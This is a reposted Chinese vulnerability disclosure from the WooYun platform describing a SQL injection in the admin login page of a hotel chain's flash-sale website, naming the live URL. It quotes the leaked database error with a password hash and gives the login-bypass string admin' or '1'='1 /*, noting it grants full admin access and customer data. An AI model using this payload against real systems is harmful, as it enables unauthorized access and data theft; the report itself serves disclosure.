简要描述:

汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.

详细说明:

问题发生在这个站点.http://miaosha.htinns.com/



标题内没有写具体信息.因为怕发布后被人入侵.



后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php



帐号输入admin'

登陆后提示如下图



爆出了查询语句.


Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '453e41d218e071ccfb2d1c99ce23906a'' at line 1]
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'





重点在这里

select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'

然后构造绕过

使用帐号admin' or '1'='1 /*

成功绕过登陆后台,截图如下

拥有后台全部权限...可以获得所有秒杀成功的数据,对其进行诈骗.

也可以发布秒杀信息,造成汉庭信任公关危机...

 

摘自:http://www.wooyun.org/bugs/wooyun-2010-05156

posted on 2014-04-04 18:35  milantgh  阅读(566)  评论(0编辑  收藏  举报